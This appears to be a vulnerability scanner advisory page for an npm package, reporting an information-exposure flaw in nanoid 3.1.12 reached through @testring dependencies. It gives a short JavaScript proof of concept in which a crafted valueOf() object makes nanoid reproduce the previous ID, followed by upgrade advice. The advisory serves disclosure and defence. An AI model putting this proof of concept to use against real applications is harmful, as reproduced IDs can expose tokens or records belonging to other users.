Vulnerabilities

1 via 3 paths

Dependencies

21

Source

npm

Find, fix and prevent vulnerabilities in your code.

Severity
  • 1
Status
  • 1
  • 0
  • 0

medium severity
new

Information Exposure

  • Vulnerable module: nanoid
  • Introduced through: @testring/utils@0.5.36 and @testring/transport@0.5.36

Detailed paths

  • Introduced through: @testring/logger@0.5.36 @testring/utils@0.5.36 nanoid@3.1.12
  • Introduced through: @testring/logger@0.5.36 @testring/transport@0.5.36 @testring/utils@0.5.36 nanoid@3.1.12
  • Introduced through: @testring/logger@0.5.36 @testring/transport@0.5.36 @testring/child-process@0.5.36 @testring/utils@0.5.36 nanoid@3.1.12

Overview

Affected versions of this package are vulnerable to Information Exposure via the valueOf() function which allows to reproduce the last id generated.

PoC

import { nanoid } from 'nanoid';

const makeProxyNumberToReproducePreviousID = () => {
  let step = 0;
  return {
    valueOf() {
      // // if (!pool || pool.length < bytes) {
      if (step === 0) {
        step++;
        return 0;
      }

      // } else if (poolOffset + bytes > pool.length) {
      if (step === 1) {
        step++;
        return -Infinity;
      }

      // poolOffset += bytes
      if (step === 2) {
        step++;
        return 0;
      }

      return 21;
    },
  };
};

const ID1 = nanoid();
const ID2 = nanoid(makeProxyNumberToReproducePreviousID());
console.log({ ID1, ID2, isIDsEqual: ID1 === ID2 });

Remediation

Upgrade nanoid to version 3.1.31 or higher.

References